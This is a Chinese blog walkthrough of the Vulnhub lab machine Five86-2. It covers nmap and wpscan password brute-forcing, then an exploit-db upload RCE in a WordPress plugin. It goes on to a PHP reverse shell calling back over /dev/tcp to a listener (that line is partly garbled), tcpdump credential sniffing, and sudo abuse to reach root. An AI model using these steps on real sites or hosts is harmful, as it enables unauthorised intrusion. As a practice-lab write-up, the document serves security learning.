{"title":"Five86-2-Vulnhub Walkthrough","content":"---\ntitle: \"Five86-2-Vulnhub Walkthrough\"\ncategories: [ \"安全技术\" ]\ntags: [ \"vulnhub\",\"靶机\",\"walkthrough\" ]\ndraft: false\nslug: \"538\"\ndate: \"2020-03-30 09:48:00\"\n---\n\n[靶机地址][1]\n\n靶机难度:初级+\n\n## 工具及漏洞信息\n\n- netdiscover\n- nmap\n- gobuster\n- tcpdump\n\n## 0x01 信息收集\n\n### 扫描靶机\n\n`netdiscover`的`-r`参数扫描`192.168.1.0/16`或者路由器管理界面查看有线连接的设备得到靶机`ip`\n\n`nmap`扫描主机及端口信息:\n\n```\nnmap -sS -A -n -T4 -p- 192.168.1.3\n```\n\n![][2]\n\n可以看到开放的端口较少,但是我看到有`wordpress`\n\n打开很卡很卡,加载半天才加载完。而且加载出来的页面是不完整的\n\n![][3]\n\n这个页面是可以修复为完整的界面的,抓包:\n\n![][4]\n\n发现对正常的响应包,响应的`url`为`http://five86-2/`,修改`hosts`文件即可:\n\n```\nWindows:C:\\Windows\\System32\\drivers\\etc\\hosts\nLinux:/etc/hosts\n添加一行:靶机ip five86-2\n```\n\n然后就可以正常打开页面了:\n\n![][5]\n\n### wpscan\n\n既然只有`wordpress`这一条路给我们走,那就只能直接上`wpscan`了\n\n使用及数据库更新方法在我之前的文章《用 wpscan 对 wordpress 站点进行渗透》里面有\n\n扫描用户:\n\n```\nwpscan --url 192.168.1.3 -e u\n```\n\n![][6]\n\n有以下用户:\n\n- admin\n- barney\n- gillian\n- peter\n- stephen\n\n保存到`users.txt`中,接着使用`wpscan`进行密码爆破:\n\n```\nwpscan --url http://192.168.1.3 -U users.txt -P /usr/share/wordlists/rockyou.txt -t 100\n(kali自带的rockyou.txt.gz文件需要先解压:gzip -d /usr/share/wordlists/rockyou.txt.gz)\n```\n\n最后爆破出来两个用户密码;\n\n- barney:spooky1\n- stephen: apollo1\n\n## 0x02 RCE 反弹 shell\n\n获得了账户密码之后,我们就可以登录上去搞事情了:\n\n![][7]\n\n刚才扫描的时候没有扫描出任何插件,但是上去有三个插件:\n\n![][8]\n\n挨个在[`exploit-db`][9]搜索后,我找到了一个`RCE`漏洞:\n\n![][10]\n\n```\n# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin\n# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive\n# Date: june 2019\n# Exploit Author: xulchibalraa\n# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/\n# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip\n# Version: 4.2995 <= 4.2997\n# Tested on: Wordpress 5.1.1, PHP 5.6\n# CVE : -\n\n\n## 1. Create a .zip archive with 2 files: index.html, index.php\n\necho \"hello\" > index.html\necho \"\" > index.php\nzip poc.zip index.html index.php\n\n## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)\n## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)\n## 4. Access the webshell from the URL displayed after upload similar to\n\nhttp://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami\n```\n\n在`youtube`上有[简单的步骤教程][11]\n\n我来跟着它做一遍,注意对应修改你的代码:\n\n```\necho \"hello\" > index.html\nindex.php用vim写入以下内容\n& /dev/tcp/192.168.1.6/3333 0>&1'\");\nzip poc.zip index.html index.php\n```\n\n![][12]\n\n写入`index.php`反弹`shell`的语句姿势很多,自行搜索\n\n新建一篇文章,默认模板会让你添加块,选择`E-Learning`模块:\n\n![][13]\n\n点击上传,选择我们的`poc.zip`:\n\n![][14]\n\n![][15]\n\n显示`upload complete`之后拉到最后点击`insert`,然后就会得到一个上传的路径:\n\n![][16]\n\n此时我的`shell`已经成功的上传到了靶机上,先在本机开启监听`nc -lvp 3333`\n\n然后访问我们的`shell`:\n\n```\nhttp://five86-2/wp-content/uploads/articulate_uploads/poc/index.php\n```\n\n本机成功拿到`shell`:\n\n![][17]\n\n## 0x03 tcpdump 抓包 ftp 账密\n\n这个`shell`肯定不好用,老方法用`python`开启`tty`:\n\n```\npython -c 'import pty; pty.spawn(\"/bin/bash\")' # 有些没有安装Python2,所以需要换成python3 -c\n```\n\n切换到`/home`目录下发现了我们之前爆破出来的账户:\n\n![][18]\n\n我们登录其中一个:`stephen: apollo1`,查看定时任务和`sudo -l`权限:\n\n![][19]\n\n无果,`id`查看组发现有一个`pcap`组\n\n![][20]\n\n`ip add`查看网卡发现有一个网络接口比较奇怪:\n\n![][21]\n\n`pcap`是和网络流量相关的,那我们使用流量工具`tcpdump`抓下包:\n\n```\ntimeout 120 tcpdump -w soap.pcap -i vethb26451b\ntimeout 120:是用来控制 tcpdump 的超时时间为 120s\ntcpdump -w 保存为文件,-i指定监听的网络接口\n```\n\n需要到根目录下执行,2 分钟后便会停止:\n\n![][22]\n\n然后我们再用`tcpdump`打开文件看一下:\n\n```\ntcpdump -r soap.pcap |more\n```\n\n![][23]\n\n在包中发现了`ftp`账户的账号和密码:`paul:esomepasswford`,尝试切换过去\n\n## 0x04 sudo 提权 root\n\n切换过后习惯性`sudo -l`查看可执行的`sudo`命令:\n\n![][24]\n\n用`sudo`来以`peter`用户去运行`/usr/sbin/service`,并切换到`/bin/bash`\n\n这个时候就成功切换到`peter`用户:\n\n```\nsudo -u peter /usr/sbin/service ../../bin/bash\n```\n\n![][25]\n\n切换后再看下`peter`账户的`sudo`权限:\n\n![][26]\n\n可以以`root`用户无密码执行`/usr/bin/passwd`,那我们现在就可以直接更改`root`账户的密码了:\n\n```\nsudo -u root passwd root\n```\n\n![][27]\n\n在`/root`目录下拿到`flag`:\n\n![][28]\n\n本文完。\n\nPS:\n\n**vulnhub 靶机简单难度的套路已经差不多做了一遍了,只有一两个新的知识点的靶机就不做了**\n**接下来我会针对性地选择好玩的靶机,这个系列没几篇了吧(大概)**\n\n参考文章:\n\n- [VulnHub 通关日记-five86-2-Walkthrough][29]\n- [five86 2 walkthrough vulnhub ctf][30]\n\n[1]: https://www.vulnhub.com/entry/five86-2,418/\n[2]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_095716.png\n[3]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_100229.png\n[4]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_101240.png\n[5]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_101839.png\n[6]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_102125.png\n[7]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_103643.png\n[8]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_103157.png\n[9]: https://www.exploit-db.com/\n[10]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_103920.png\n[11]: https://youtu.be/knst26fEGCw?t=44\n[12]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_105145.png\n[13]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_140110.png\n[14]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_140334.png\n[15]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_140925.png\n[16]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_140956.png\n[17]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_142334.png\n[18]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_142738.png\n[19]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_143212.png\n[20]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_143404.png\n[21]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_143757.png\n[22]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_144656.png\n[23]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_150009.png\n[24]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_150242.png\n[25]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_150429.png\n[26]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_150524.png\n[27]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_150948.png\n[28]: https://img.soapffz.com/archives_img/2020/03/30/archives_20200330_150831.png\n[29]: https://mp.weixin.qq.com/s/V2V03UKaQgQaq3oXcZGvmQ\n[30]: https://www.hacknos.com/five86-2-walkthrough-vulnhub-ctf/","date_published":"2020-03-30T01:48:00.000Z","summary":"","tags":["post","vulnhub","靶机","walkthrough"],"sources":["xlog"],"attributes":[{"trait_type":"xlog_slug","value":"538"}],"attachments":[],"external_urls":[""],"type":"note"}